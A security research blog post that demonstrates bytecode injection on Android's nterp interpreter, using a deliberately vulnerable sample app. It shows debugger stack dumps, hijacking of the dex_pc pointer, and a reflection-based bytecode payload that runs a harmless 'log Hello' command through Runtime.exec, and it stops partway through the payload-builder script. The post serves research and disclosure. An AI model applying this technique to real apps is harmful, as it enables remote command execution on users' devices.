Bytecode Injection (Part 3)

With all the basics out of the way, this blog post shows the first bytecode-based exploitation technique on Android: bytecode injection! This opens the door to many interesting exploits, where injected bytecode can function as an all-in-one solution or an intermediate stage.

To fully understand this technique, it is recommended to read the introductory blog posts first! At the time of writing, there is no public information on this topic except for the Android source code.

Motivation

When exploiting a memory error, several security mechanisms must be bypassed. These include, but are not limited to, DEP/W^X, ASLR, RELRO, canaries, and, if you are unlucky, ShadowStack, CFI and SafeStack. Notice that these security mechanisms were not developed all at once, but rather one by one in response to emerging exploitation techniques. For example, native code injection on the stack caused the stack to be mapped with rw- instead of rwx. Another example is ASLR being a response to return-into-libc and ROP. This is called the arms race in binary exploitation, where a response from the offensive security community triggers a response from the defensive security community and vice versa.

Unfortunately, native code is not the only resource that can be executed. Notice that native code is basically interpreted by the CPU. With that in mind, other interpreters can be investigated and analysed for whether they allow particular exploitation techniques. In this blog series, Android’s interpreter nterp is analysed for parallels to the exploitation techniques of native code.

The general motivation for why other interpreters are interesting in the context of exploitation techniques is simple: most security mechanisms are interpreter-specific, i.e. specific to the execution environment (architecture, OS, …). For example, DEP/W^X enforces that pages are never rwx (for the sake of the example, ignore JIT). Hence, native code injection is not feasible. However, changing the interpreter to nterp also changes the entire execution environment an attacker is working with. As we see later on, nothing prevents an attacker from injecting and executing bytecode. In other words, most security mechanisms for one interpreter do not generalize to other interpreters.

The Problems

Although impossible to prove with concrete references, I claim that nterp does not distinguish data and code. In other words, whatever the dex_pc is set to is interpreted. This is exactly what happened decades ago with native code! As in the early days of binary exploitation, given the ability to redirect control flow through a memory error, nterp can be forced to execute whatever an attacker desires.

Consider the following example. In a setting where an attacker gets access to a stack pointer and the ability to repeatedly exploit a stack-buffer index out-of-bounds write, it is possible to construct an exploit using bytecode. In contrast, directly using classical native-level techniques like ROP seems infeasible, because ROP needs leaks of executable memory regions. So, bytecode injection opens new avenues for exploitation!

While the above example works for a remote attacker, a local attacker is not even constrained by ASLR, because of Android’s fork server architecture. For a local attacker in the above example, ROP becomes feasible and bytecode injection becomes easier, because a lot of data is identical across multiple apps.

Sample App

For this blog post, we construct a simple, deliberately vulnerable app with

a repeatable stack-buffer index out-of-bounds write primitive, and
a single stack address leak.

The idea is to create a scenario where e.g. ROP is infeasible and bytecode injection is simple. Not only does this approach ease understanding nuances of bytecode-based exploitation, but it also shows that bytecode injection is not superfluous, i.e. it is a new tool in an attacker’s tool box.

Notice that the app assumes a remote attacker, which is facilitated using simple socket I/O. In practice, an attacker may serve a malicious website that exploits a bug in V8 or perform a MITM attack on the communication of the target app and a backend server. Now, consider the following, relevant app snippets.

private void run() {
    while (true) {
        try {
            Log.d(TAG, "Initializing server....");
            this.initServer();

            Log.d(TAG, "Setting up connection....");
            this.setupConnection();

            // Send leak
            this.writeLong(MainActivity.leakStack());

            // Loop until user wants to exit
            while (this.readBool()) {
                // Receive index and value for stack oob
                MainActivity.writeIndexed(this.readInt(), this.readLong());
            }
        } catch (final IOException e) {
            e.printStackTrace();
        } finally {
            this.close();
        }
        if (!stayAlive) {
            break;
        }
        Log.d(TAG, "Restarting server socket....");
    }
}

@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    // Run the vulnerable server loop on a background thread
    new Thread(this::run).start();
}

public static native long leakStack();
public static native void writeIndexed(int index, long value);

Below are the vulnerable, native methods invoked in the above Java code. The memory errors, i.e. a unique stack pointer leak and a repeatable stack-buffer index out-of-bounds write, manifest at the JNI layer.

extern "C"
JNIEXPORT jlong JNICALL
Java_com_poc_poc_1remote_MainActivity_leakStack(JNIEnv *env, jclass clazz) {
    uint64_t i;
    return (uint64_t)&i;
}

extern "C"
JNIEXPORT void JNICALL
Java_com_poc_poc_1remote_MainActivity_writeIndexed(JNIEnv *env, jclass clazz,
                                                   jint index, jlong value)
                                                   __attribute__ ((optnone)) {
    uint64_t i;
    uint64_t *buffer = &i;
    buffer[index] = value;
}

Optimizations for writeIndexed had to be disabled, probably because some data-flow analysis in the compiler realized that the code does not do anything meaningful, i.e. it has no (direct) outputs. However, this suffices for the purpose of proving that bytecode injection is possible.

With the above setup, a remote attacker can connect to the vulnerable app and repeatedly write on the stack. Moreover, an attacker is able to construct data structures and references to these structures on the stack, yielding a powerful primitive especially for data-oriented attacks.
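To make the attacker's side of this protocol concrete, the following is a minimal sketch of the message framing. It assumes that the app's readBool, readInt, readLong and writeLong helpers (not shown in the post) behave like java.io.DataInputStream and DataOutputStream, i.e. big-endian with no padding. All function names here are hypothetical.

```python
import struct

U64_MASK = (1 << 64) - 1


def unpack_leak(data: bytes) -> int:
    """Decode the 8-byte stack leak sent by the app (assumed big-endian)."""
    (leak,) = struct.unpack(">Q", data)
    return leak


def oob_index(buffer_addr: int, target_addr: int) -> int:
    """Index such that buffer[index] aliases target_addr (8-byte elements)."""
    delta = target_addr - buffer_addr
    if delta % 8:
        raise ValueError("target must be 8-byte aligned relative to the buffer")
    return delta // 8


def pack_write(index: int, value: int) -> bytes:
    """One loop iteration: boolean 'continue', 32-bit index, 64-bit value."""
    return struct.pack(">?iQ", True, index, value & U64_MASK)


def pack_exit() -> bytes:
    """Boolean 'false' that makes the app leave its write loop."""
    return struct.pack(">?", False)
```

The address of the buffer relative to the leaked address depends on the concrete stack layout and has to be determined per target, e.g. with a debugger as done later in this post.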

Building the app in release mode with default Android Studio settings yields an .apk file, which is actually a .zip file.

$ unzip app-release.apk
$ ls
AndroidManifest.xml  assets  classes.dex  DebugProbesKt.bin  kotlin  lib  META-INF  res  resources.arsc

There is only a single classes.dex file that must account for all Java code in the app. Moreover, the classes.dex file must contain some of the framework-related bytecode, types etc. required to launch the app. Therefore, the context of e.g. MainActivity::run is classes.dex. A quick .dex file analysis reveals that classes.dex indeed holds many more types and methods than are used to program the sample app.

> file --file unpacked_poc_remote/classes.dex --type DEX
classes.dex> list types --regex java/lang/Runtime
    [Index = 0x1507]: java/lang/Runtime
    [Index = 0x1508]: java/lang/RuntimeException
classes.dex> list methods --regex "Runtime::getRuntime"
    [Index = 0xa6ee]: java/lang/Runtime java/lang/Runtime::getRuntime()

Before delving into exploitation, let's see how the native methods are invoked by MainActivity::run. To increase readability, Lcom/poc/poc_remote/MainActivity is replaced with LMainActivity, where L indicates an object type, and some formatting is done.

classes.dex> list methods --regex "MainActivity::run"
    [Index = 0xa51d, Offset = 0x37db10, Num Regs = 0x4]:
        private void MainActivity::run()
    [Index = 0xa51d]:
        void MainActivity::run()
classes.dex> decompile method --index 0xa51d
    [Index = 0xa51d, Offset = 0x37db10, Num Regs = 0x4]:
    private void MainActivity::run()
        ...
        001e: INVOKE_DIRECT {v3}, METHOD:LMainActivity;->setupConnection()V
        0024: INVOKE_STATIC {}, METHOD:LMainActivity;->leakStack()J
        002a: MOVE_RESULT_WIDE v0
        ...
        003e: INVOKE_DIRECT {v3}, METHOD:LMainActivity;->readInt()I
        0044: MOVE_RESULT v0
        0046: INVOKE_DIRECT {v3}, METHOD:LMainActivity;->readLong()J
        004c: MOVE_RESULT_WIDE v1
        004e: INVOKE_STATIC {v0, v1, v2}, METHOD:LMainActivity;->writeIndexed(I,J)V
        0054: GOTO +-17
        ...

Invocations of MainActivity::leakStack and MainActivity::writeIndexed use the invoke-static instruction. This is not surprising, because both methods are declared using the static keyword. writeIndexed is given v2 as a third register because its long argument is a wide value that occupies the register pair v1/v2 (compare MOVE_RESULT_WIDE v1 above), and invoke instructions list both halves of such a pair. Overall, bytecode is used to execute native methods, and thus execution must eventually continue in bytecode after the native methods are done executing.

Note: Branch offsets are in terms of code units, whereas the addresses in the listing are byte offsets. In the above code snippet, the GOTO +-17 actually references 0x54 + 2 * (-17) = 0x32. In general, the size of each instruction is a multiple of the code unit size (two bytes), which means instruction offsets and addresses are always two-byte aligned!
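The arithmetic in the note can be written as a tiny helper. This is only an illustration; the function name is made up for this sketch.

```python
CODE_UNIT_SIZE = 2  # a Dalvik code unit is 16 bits wide


def branch_target(insn_byte_offset: int, rel_code_units: int) -> int:
    """Byte offset a relative branch refers to, given its own byte offset."""
    return insn_byte_offset + CODE_UNIT_SIZE * rel_code_units


# The GOTO at byte offset 0x54 with relative offset -17 from the listing
print(hex(branch_target(0x54, -17)))
```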

Bytecode Injection

From a previous blog post, we know that the bytecode return address lies on the stack. So, the layout of nterp and JNI stack frames can be used to identify what critical data is in close proximity to the out-of-bounds write. Below is an excerpt from a particular app execution.

gef➤  canary
    [+] The canary of process 9862 is at 0x7ff247af28, value is 0xe009ee421ed97f00
gef➤  i r sp
    sp             0x7c0fe66620        0x7c0fe66620
gef➤  hexdump qword $sp --size 0x28
0x7c0fe66620 │+0x0000   0x0013000000000000   // <-- $sp
0x7c0fe66628 │+0x0008   0x0000007c0fe66650   
0x7c0fe66630 │+0x0010   0x0013000000000000   
0x7c0fe66638 │+0x0018   0x0000020000000000   
0x7c0fe66640 │+0x0020   0x0000007f27664480   
0x7c0fe66648 │+0x0028   0xb400007d48b969f0   
0x7c0fe66650 │+0x0030   0x0000000000000000   
0x7c0fe66658 │+0x0038   0x66f0649020037d8d   // Stack canary
0x7c0fe66660 │+0x0040   0x0000007c0fe66758   // Old base pointer (x29)
0x7c0fe66668 │+0x0048   0x0000007c14c741ac   // Return address (x30)
0x7c0fe66670 │+0x0050   0x0000007f27664480   // ArtMethod* <---- END OF JNI FRAME
0x7c0fe66678 │+0x0058   0x0000007c0fe66748   // Padding? (Vrefs of calling method)
0x7c0fe66680 │+0x0060   0x0000000000000000   // Padding
0x7c0fe66688 │+0x0068   0x0000000000000000   // Padding? Expected d0-d7
0x7c0fe66690 │+0x0070   0x0000000000000000   // x1
0x7c0fe66698 │+0x0078   0x0000000000000000   // x2
0x7c0fe666a0 │+0x0080   0x0000000000000000   // x3
0x7c0fe666a8 │+0x0088   0x0000000000000000   // x4
0x7c0fe666b0 │+0x0090   0x0000000000000000   // x5
0x7c0fe666b8 │+0x0098   0x0000000000000000   // x6
0x7c0fe666c0 │+0x00a0   0xb400007df8b82a10   // x7
0x7c0fe666c8 │+0x00a8   0x0000000000000000   // Marking Register (MR, x20)
0x7c0fe666d0 │+0x00b0   0xb400007df8b82ad0   // Suspend (x21)
0x7c0fe666d8 │+0x00b8   0x0000007c147a64be   // dex_pc_ptr (PC, x22)
0x7c0fe666e0 │+0x00c0   0x0000007c14a867f3   // Current Instruction (INST, x23)
0x7c0fe666e8 │+0x00c8   0x0000007c87400880   // Table of bytecode handlers (IBASE, x24)
0x7c0fe666f0 │+0x00d0   0x0000007c0fe66748   // VRefs (REFS, x25)
0x7c0fe666f8 │+0x00d8   0x0000007c0fe66758   // x26 (informally: vregs)
0x7c0fe66700 │+0x00e0   0x0000007c0fe66748   // x27
0x7c0fe66708 │+0x00e8   0x0000007c0fe66770   // x28
0x7c0fe66710 │+0x00f0   0x0000007c0fe66758   // FP (x29)
0x7c0fe66718 │+0x00f8   0x0000007c87409aa0   // Return address (x30)
0x7c0fe66720 │+0x0100   0x0000007f27664440   // ArtMethod* <---- END OF NTERP FRAME
0x7c0fe66728 │+0x0108   0x0000007f276071e0   // ArtMethod*
0x7c0fe66730 │+0x0110   0x0000007c147a62a8   // Alignment? may be a dex pc
0x7c0fe66738 │+0x0118   0x0000007c147a64be   // dex_pc_ptr
0x7c0fe66740 │+0x0120   0x0000007c0fe66770   // Caller Frame Pointer (FP)
0x7c0fe66748 │+0x0128   0x0000000000000000   // Vrefs
0x7c0fe66750 │+0x0130   0x12f8084800000000   
0x7c0fe66758 │+0x0138   0x0000000000000200   // Vregs
0x7c0fe66760 │+0x0140   0x12f8084800130000

Surprisingly, the JNI frame is slightly modified, as the above instance does not contain spilled floating point registers d0 to d7. However, as the comment in the JNI frame states, only a generic JNI frame is described, not concrete frames for every possible invocation scenario. An interesting observation is that gef claims the canary is 0xe009ee421ed97f00, but the disassembly of writeIndexed suggests the canary is 0x66f0649020037d8d. Apparently, Android’s Bionic library uses random canaries, which also seems to apply to Android’s runtime. Further, there are two instances of a dex_pc_ptr! From top to bottom, the first one is part of the spilled registers in the JNI frame, so it will be put back into x22 upon return to the calling method. The second one seems to be stored and managed in the nterp frame. Maybe this is used to ensure that x22 can be restored on function invocations where x22 is not spilled.

Let's verify that bytecode execution continues at whatever value is stored in the spilled x22 on the stack. To do so, we can overwrite the value with something arbitrary, like 0x4242424242424242!

gef➤  set *(unsigned long long*)0x0000007c0fe666d8=0x4242424242424242
gef➤  c                                                                                              
Continuing.                                                                                          
                                                                                                     
Thread 20 "Thread-2" received signal SIGSEGV, Segmentation fault.                                    
...
$x22 : 0x4242424242424242 ("BBBBBBBB"?)
...
→ 0x7c87409ac0 <nterp_helper+1984> ldrh   w23,  [x22,  #6]!         // x23 = xINST (next opcode)
  0x7c87409ac4 <nterp_helper+1988> and    x16,  x23,  #0xff         // x16 = first byte of next instruction
  0x7c87409ac8 <nterp_helper+1992> add    x16,  x24,  x16,  lsl #7  // x16 = IBASE + opcode * <bytecode handler size>
  0x7c87409acc <nterp_helper+1996> br     x16                       // branch to handler

So, nterp tries to use the spilled register value to derive the next bytecode instruction. Thus, overwriting this value enables an attacker to redirect bytecode control flow to any location. Most importantly, bytecode execution can be pivoted to a controlled location. In this case: the stack. Of course, either the dex_pc_ptr must be set to addr_payload-6 or the first three instructions should be NOPs to account for the added 6 in the faulting instruction, i.e. the size in bytes of the invoke-static instruction used to invoke writeIndexed.
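The dispatch sequence in the disassembly and the two ways of compensating for the added 6 bytes can be sketched as follows. The constants are read off the instructions shown above; the helper names are hypothetical.

```python
HANDLER_SIZE = 1 << 7  # from `add x16, x24, x16, lsl #7`
RESUME_ADVANCE = 6     # from `ldrh w23, [x22, #6]!` (size of invoke-static)
NOP = b"\x00\x00"      # one code unit with opcode 0x00


def handler_address(ibase: int, code_unit: int) -> int:
    """Address nterp branches to for the given first code unit."""
    opcode = code_unit & 0xFF
    return ibase + opcode * HANDLER_SIZE


def spilled_pc_for(payload_addr: int) -> int:
    """Value to write into the spilled x22 so that execution resumes at payload_addr."""
    return payload_addr - RESUME_ADVANCE


def with_nop_padding(payload: bytes) -> bytes:
    """Alternative: point x22 at the padding, which nterp skips over."""
    return NOP * (RESUME_ADVANCE // 2) + payload
```

With the IBASE value from the stack dump, handler_address(0x7c87400880, 0x71) gives the handler that would be used for an invoke-static (opcode 0x71).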

With the ability to control where nterp continues execution, it remains to figure out what to execute.

Building a Bytecode Payload

First of all, the goal must be clarified. In this case, the goal is command execution in the context of the vulnerable app using only bytecode. However, gaining native code execution using bytecode as an intermediate stage to set up e.g. the stack is also possible. Command execution is chosen because it involves calling at least one legitimate method. Therefore, showing that command execution is possible also proves that bytecode injection is capable of invoking normal library or application-specific methods, despite coming from a memory error. For simplicity, we try to express the following Java code directly in bytecode.

Runtime.getRuntime().exec("log Hello");

Naively translating this to bytecode, e.g. by creating a PoC app, building it and decompiling the .apk file or using d8, yields the first payload version.

classes.dex> list methods --regex Runtime::getRuntime
[Offset = 0x0]: classes.dex
    [Index = 0xa254]: Runtime Runtime::getRuntime()
classes.dex> list methods --regex "MainActivity::simpleShellcode"
[Offset = 0x0]: classes.dex
    [Index = 0xa097, Offset = 0x363638, Num Regs = 0x2]:
        private void MainActivity::simpleShellcode()
    [Index = 0xa097]:
        void MainActivity::simpleShellcode()
classes.dex> decompile method --index 0xa097
    [Index = 0xa097, Offset = 0x363638, Num Regs = 0x2]:
    private void MainActivity::simpleShellcode()
        0000: INVOKE_STATIC {}, METHOD:LRuntime;->getRuntime()LRuntime;
        0006: MOVE_RESULT_OBJECT v1
        0008: CONST_STRING v0, STRING:"log Hello"(14)
        000c: INVOKE_VIRTUAL {v1, v0}, METHOD:LRuntime;->exec(LString;)LProcess;
        0012: RETURN_VOID

With such a payload at hand, one may be tempted to copy it over and try it! However, as another app is used to construct this payload, most certainly type and method indices are incorrect. An example is that invoke-static invokes the Runtime::getRuntime method with index 0xa254. From a previous section it is known that the sample app uses Runtime::getRuntime with index 0xa6ee. Therefore, these indices are incompatible. The same holds for the String constant "log Hello". Most certainly the vulnerable app does not even contain such a String constant! Therefore, to get command execution using Runtime.getRuntime().exec("..."), we need to construct a payload that is more dynamic. To that end, we strive for the following properties:

dynamic String instances
dynamic method invocation

Using a different app is helpful to get the overall payload layout and avoids having to deal with e.g. register allocations. However, a context is often app-specific, which must be considered during payload construction.

Dynamic Strings

As discussed in a previous blog post, the instruction fill-array-data can be used to fill an array with data directly located inside the bytecode. So, long story short, an arbitrary char[] can be constructed using fill-array-data. For this to work, an attacker needs to know the type index of a char[]. Luckily, the char[] type is used frequently, so it most likely resides in any .dex we encounter. For a start the payload looks like below:

new-array v0, <length>, char[]
fill-array-data v0, +<byte offset//2>
...
[fill-array-data-payload]
ident=0x0300
element_width=0x2
size=len(command)
data=[ command[0], ..., command[-1] ]
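As a minimal sketch, the payload structure above can be serialized like this. The layout (ident, element width, size, data, all little-endian) follows the Dalvik bytecode documentation; the function name is made up for illustration.

```python
import struct

FILL_ARRAY_DATA_IDENT = 0x0300
CHAR_WIDTH = 2  # a Java char is a 16-bit UTF-16 code unit


def fill_array_data_payload(text: str) -> bytes:
    """Serialize text as a fill-array-data-payload for a char[]."""
    data = text.encode("utf-16-le")
    size = len(data) // CHAR_WIDTH  # number of array elements
    header = struct.pack("<HHI", FILL_ARRAY_DATA_IDENT, CHAR_WIDTH, size)
    # With 2-byte elements the data length is always even, so no padding is needed
    return header + data


print(fill_array_data_payload("exec").hex())
```

Since the instruction references this table with a relative offset in code units, the table itself must start at a two-byte aligned position within the injected bytecode.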

From now on, assume an attacker has a char[] instance describing a command, like "log Hello". The next step is to construct a String from a char[]. On Android, StringBuilder is the type of choice. Again, it is used so frequently that every .dex file is expected to contain the corresponding type. The main challenge is whether StringBuilder::append(char[]) exists. In case of the vulnerable app it does, but it may not be the case for another app. If there is no way to construct a String from bytecode, an attacker can also inject a fake String object (see next post regarding bytecode reuse). Continuing with the StringBuilder, consider the following analysis:

classes.dex> list types --regex "StringBuilder"
    [Index = 0x150f]: StringBuilder
classes.dex> list methods --regex "StringBuilder::append"
    [Index = 0xa750]: StringBuilder StringBuilder::append([C)
classes.dex> list methods --regex "StringBuilder::<init>"
    [Index = 0xa741]: void StringBuilder::<init>()
classes.dex> list methods --regex "StringBuilder::toString"
    [Index = 0xa75d]: String StringBuilder::toString()

As the name suggests, StringBuilder::<init>() is the constructor of StringBuilder that does not take any parameters. In Java, invoking this constructor is done via new StringBuilder(). Overall, the following Java snippet describes what we try to do directly in bytecode:

char[] c = new char[] {'l', 'o', 'g', ' ', 'H', 'e', 'l', 'l', 'o'};
StringBuilder b = new StringBuilder();
b.append(c);
String command = b.toString();

Putting together all the pieces and equipped with the bytecode documentation and a sample app for payload creation, the following bytecode can be constructed:

0000: CONST_16 v0, #+<len(command)>
0004: NEW_ARRAY v0, v0, TYPE:char[]
0008: FILL_ARRAY_DATA v0, +<offset to command data // 2>
000e: NEW_INSTANCE v1, TYPE:StringBuilder
0012: INVOKE_DIRECT {v1}, METHOD:StringBuilder-><init>()
0018: INVOKE_VIRTUAL {v1, v0}, METHOD:StringBuilder->append(char[])
001e: INVOKE_VIRTUAL {v1}, METHOD:StringBuilder->toString()
0024: MOVE_RESULT_OBJECT v2
...
offset command data: [fill-array-data-payload]

After the above bytecode is executed, v2 contains a reference to a String object with contents "log Hello". Notice that this bytecode is independent of the String’s semantics, i.e. this is a generic approach for constructing a String instance from a char[] and not specific to a system command! The only components that need to change for a new String are length fields and the array contents. Of course, one may have to use new vregs to prevent existing vregs from being clobbered.

Note: Calling the constructor on a newly created instance is sometimes optional. If the goal is to create a valid object, then one may only use new-instance, which means the index of the constructor method can be ignored. Of course, using the object later on may cause unexpected behaviour, including crashes.

Problem with String Constructors

One might ask why StringBuilder::append(char[]) is preferred over String::<init>(char[]). This is motivated by the fact that String constructors are disabled on Android. At least the source code suggests that StringFactory should be used instead of the String constructors directly:

public String(char value[]) {
    // BEGIN Android-changed: Implemented as compiler and runtime intrinsics.
    /*
    this(value, 0, value.length, null);
            */
    throw new UnsupportedOperationException("Use StringFactory instead.");
    // END Android-changed: Implemented as compiler and runtime intrinsics.
}

Therefore, we directly use the StringBuilder type, also because it is used frequently and easy to use. Notice that although String constructors cannot be easily used, this does not imply that the String type occurs less frequently!

Dynamic Method Invocation

The problem to solve is as follows. The goal is to call Runtime.getRuntime().exec(command), but it cannot be assumed that the context of the bytecode provides the method indices for getRuntime and exec. In practice, Runtime.getRuntime() is very common: it occurs in the context, although the method and the Runtime type are not explicitly used in the vulnerable app:

classes.dex> list types --regex "Runtime"
    [Index = 0x1507]: Runtime
classes.dex> list methods --regex "Runtime::getRuntime"
    [Index = 0xa6ee]: Runtime Runtime::getRuntime()
classes.dex> list methods --regex "Runtime::exec"
classes.dex>

Unfortunately, Runtime::exec is not very common. Luckily, Java provides a feature called reflection. Obviously, the name of the function to be invoked is known, i.e. "exec". So, in Java, dynamically resolving the method looks like so:

Runtime.getRuntime().getClass().getDeclaredMethod("exec", new Class[] { String.class });

As can be seen in the above examples, including dynamic String creation, successful bytecode creation involves a lot of creativity and thinking outside the box to find semantically fitting bytecode instruction sequences that use as few context-specific resources as possible. While it is possible to use Java code to construct the initial bytecode layout, indices etc. must be adjusted to fit the context. Bytecode generated from Java code may use e.g. types that are not available in the context.

The String type is also very common, so it can be assumed to be available in all .dex files and thus in every context an attacker encounters. With all that, the bytecode can be seen below. Notice that v6 := "exec".

003a: INVOKE_STATIC {}, METHOD:Runtime->getRuntime()
0040: MOVE_RESULT_OBJECT v4
0042: INVOKE_VIRTUAL {v4}, METHOD:Object->getClass()
0048: MOVE_RESULT_OBJECT v5
004a: v6 := "exec" ...
0052: CONST_4 v7, #+1
0054: NEW_ARRAY v7, v7, TYPE:[Class
0058: CONST_4 v8, #+0
005a: CONST_CLASS v9, TYPE:String
005e: APUT_OBJECT v9, v7, v8
0062: INVOKE_VIRTUAL {v5, v6, v7}, METHOD:Class->getDeclaredMethod(String,Class[])

An alternative approach may be to use Runtime.class.getDeclaredMethod(...). However, we need the instance of Runtime for invocation of exec. This approach may save us the getClass invocation, although this would most likely be replaced with an equivalent instruction.

What is left to do is to invoke the resolved method. Of course, invocation depends on what parameters the target method expects. The below code snippet continues with calling exec.

0068: MOVE_RESULT_OBJECT v5
006a: v6 := "log Hello" ...
0072: FILLED_NEW_ARRAY {v6}, TYPE:[LObject;
0078: MOVE_RESULT_OBJECT v6
007a: INVOKE_VIRTUAL {v5, v4, v6}, METHOD:LMethod;->invoke(LObject;,[LObject;)

For simplicity, I omitted the creation of the "log Hello" command.

Observe that dynamically invoking methods using reflection requires knowledge of specific type and method indices, among which are:

Class[], String and Object[] type indices
Runtime::getRuntime(), Object::getClass(), Class::getDeclaredMethod(String, Class[]) and Method::invoke(Object, Object[]) method indices

With the above approaches, i.e. dynamic strings and method invocations, it is possible to get command execution using only bytecode from a memory error in a vulnerable app. Or so you may think, but the execution environment is cruel, especially with regard to vreg allocations!

Limited, dynamic Vregs

A method specifies the number of vregs it needs in its associated code_item. When executing a method, nterp allocates as many vregs (and vrefs) as specified on the stack. Now, what happens if the hijacked method requested 4 vregs, but the payload uses 10? As has been discussed in a previous blog post, vregs and vrefs have the following properties:

Vrefs array precedes vregs array on stack.
Vrefs array is adjacent to vregs array.
Vrefs and vregs are parallel and entries are semantically linked. For example, vreg v0 is linked to vref r0.
Vrefs and vregs array accesses are not bounds-checked.

Continuing the example, accessing vregs v0 to v3 is legitimate. However, accessing v4 is problematic. If the access to v4 is a write, then r4 will most likely also be overwritten. The problem is that r4 refers to the first value after the actual vrefs array, i.e. v0. Therefore, if something is stored into v0 and then e.g. a constant is written to v4, then v0 will be modified, in this case set to 0. Also, the first 32-bit value after vregs is changed to the constant assigned to v4. This has the neat side effect that an attacker can fully read and write stack values located after vrefs and vregs, enabling attacks like JITROP. From a bytecode perspective, depending on the number of registers used in the payload, this is problematic, because registers holding important data like the Runtime instance may be clobbered.

This is where math can save the day! Say the hijacked method requested N vregs. Then, the first overlap happens at v<N>, because a write to v<N> may also set r<N>, which overlaps with v0. So, to prevent overflowing into the vregs, an access to v<N> can be redirected to v<N+N>. This skips over the entire vregs array, and thus reinterprets the region after vregs as a fresh vrefs-vregs array pair. Hence, the mapping is N -> N+N, but what happens if v<N+1> or v<N+2> is accessed? And what about v<N+N+N+2>? To resolve this problem, observe that each block, i.e. a range of vreg accesses that do not overflow into the following block, is of size N * 2. The first block consists of the original vrefs and vregs, in that order, each of length N. Say the payload needs M vregs to work. Then the number of blocks is k := (M + N - 1) // N, i.e. M / N rounded up, where // is integer division. Now, if vreg v<X> with 0 <= X < M is to be accessed, then compute the block id X // N and the offset into the block X % N. The actual vreg access is then v<(X // N) * (N * 2) + (X % N)>. To summarize,

X // N: Block id
N * 2: Block size in register entries
X % N: Offset within a block

Consider the following visualization for the case where the payload uses 10 vregs, the hijacked method only allocated memory for 4 vregs, and the payload tries to access vreg v4. Of course, whatever data overlaps with the artificial blocks is corrupted. Hence, care must be taken when using this approach. Luckily, blocks can be shifted up the stack until no critical data is overwritten.

With a simple function, this can be abstracted away, so we never have to do math again:

available_vregs = 4  # number of vregs the hijacked method allocated (N)
v = lambda i: (i // available_vregs) * (2 * available_vregs) + (i % available_vregs)
v0 = v(0)
v1 = v(1)
v2 = v(2)
v3 = v(3)
v4 = v(4)
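To check that this mapping really avoids overlaps, the following sketch models the stack as 32-bit slots counted from the start of the vrefs array, so that r<i> lives in slot i and v<i> in slot N + i. It is a simplified model based on the properties listed above, not a reproduction of nterp's implementation, and all names are hypothetical.

```python
def remap(i: int, n: int) -> int:
    """Map logical payload vreg i to the vreg index actually encoded."""
    return (i // n) * (2 * n) + (i % n)


def touched_slots(reg: int, n: int) -> set:
    """Slots affected by a write to v<reg>: its vref entry and its vreg entry."""
    return {reg, n + reg}


def collisions(regs, n):
    """Return (first_reg, second_reg, slot) for every slot shared by two registers."""
    owner = {}
    clashes = []
    for reg in regs:
        for slot in touched_slots(reg, n):
            if slot in owner:
                clashes.append((owner[slot], reg, slot))
            else:
                owner[slot] = reg
    return clashes


N, M = 4, 10  # hijacked method allocated 4 vregs, payload needs 10
naive = list(range(M))
mapped = [remap(i, N) for i in naive]

print(mapped)
print(len(collisions(naive, N)), len(collisions(mapped, N)))
```

In this model, the naive numbering makes v4 share a slot with v0, while the remapped indices touch every slot at most once.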

The Payload

Finally, with all caveats out of the way, the final payload can be constructed. It is beneficial to implement a BytecodeBuilder, which dynamically builds bytecode based on the documentation. This eases testing and constructing different kinds of payloads! In this case study, the payload can be fully expressed like below. Note that the comments do not always show the correct indices, lengths and offsets. Most of these values are computed dynamically or change with the payload size and layout. Also, another app is used to generate the payload layout and avoid having to deal with register allocations. The app is forced to use the tricks for dynamic strings and method invocations at the Java level.

builder = BytecodeBuilder(type_map={
            'char[]': char_array_index,
            'StringBuilder': stringbuilder_index,
            'Class[]': classarray_index,
            'String': string_index,
            'Object[]': objectarray_index,
            'Object': object_index,
        })

# [Index = 0x5, Offset = 0x31c, Num Regs = 0xa]: private static void com/poc/shellcode/MainActivity::shellcode()
    return (builder
# 0000: 13 00 12 00       CONST_16 v0, #+18
        .const_16(v0, len(command))
# 0004: 23 00 13 00       NEW_ARRAY v0, v0, TYPE:[C
        .new_array(v0, v0, 'char[]')
# 0008: 26 00 3e 00 00 00 FILL_ARRAY_DATA v0, +62
        .fill_array_data(v0, 65)
# 000e: 22 01 0d 00       NEW_INSTANCE v1, TYPE:Ljava/lang/StringBuilder;
        .new_instance(v1, 'StringBuilder')
# 0012: 70 10 0b 00 01 00 INVOKE_DIRECT {v1}, METHOD:Ljava/lang/StringBuilder;-><init>()V
        .invoke_direct(1, stringbuilder_constructor_index, [v1])
# 0018: 6e 20 0c 00 01 00 INVOKE_VIRTUAL {v1, v0}, METHOD:Ljava/lang/StringBuilder;->append([C)Ljava/lang/StringBuilder;
        .invoke_virtual(2, stringbuilder_append_chararray_index, [v1, v0])
# 001e: 12 42             CONST_4 v2, #+4
        .const_16(v2, 4)
# 0020: 23 22 13 00       NEW_ARRAY v2, v2, TYPE:[C
        .new_array(v2, v2, 'char[]')
# 0024: 26 02 46 00 00 00 FILL_ARRAY_DATA v2, +70
        .fill_array_data(v2, 65)
# 002a: 22 03 0d 00       NEW_INSTANCE v3, TYPE:Ljava/lang/StringBuilder;
        .new_instance(v3, 'StringBuilder')
# 002e: 70 10 0b 00 03 00 INVOKE_DIRECT {v3}, METHOD:Ljava/lang/StringBuilder;-><init>()V
        .invoke_direct(1, stringbuilder_constructor_index, [v3])
# 0034: 6e 20 0c 00 23 00 INVOKE_VIRTUAL {v3, v2}, METHOD:Ljava/lang/StringBuilder;->append([C)Ljava/lang/StringBuilder;
        .invoke_virtual(2, stringbuilder_append_chararray_index, [v3, v2])
# 003a: 71 00 09 00 00 00 INVOKE_STATIC {}, METHOD:Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;
        .invoke_static(0, getruntime_index, [])
# 0040: 0c 04             MOVE_RESULT_OBJECT v4
        .move_result_object(v4)
# 0042: 6e 10 08 00 04 00 INVOKE_VIRTUAL {v4}, METHOD:Ljava/lang/Object;->getClass()Ljava/lang/Class;
        .invoke_virtual(1, object_getclass_index, [v4])
# 0048: 0c 05             MOVE_RESULT_OBJECT v5
        .move_result_object(v5)
# 004a: 6e 10 0d 00 03 00 INVOKE_VIRTUAL {v3}, METHOD:Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
        .invoke_virtual(1, stringbuilder_tostring_index, [v3])
# 0050: 0c 06             MOVE_RESULT_OBJECT v6
        .move_result_object(v6)
# 0052: 12 17             CONST_4 v7, #+1
        .const_16(v7, 1)
